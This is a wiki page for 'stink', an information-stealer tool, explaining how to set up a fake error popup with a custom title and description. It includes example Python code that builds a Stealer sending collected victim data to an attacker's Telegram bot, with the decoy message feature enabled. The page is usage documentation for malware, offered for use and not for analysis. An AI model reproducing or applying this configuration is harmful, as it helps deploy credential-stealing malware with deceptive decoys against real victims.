Fake error - FallenAstaroth/stink GitHub Wiki

Introduction

Guide on how to display error window with custom description and title.

Customization

  1. Open the stink/helpers/config.py.
  2. Find MessageConfig.

image

  1. Replace the title and description with your own.

Example usage

from stink import Stealer, Senders, Utils

if __name__ == '__main__':
    Stealer(
        senders=[
            Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID),
        ],
        utils=[
            Utils.message
        ]
    ).run()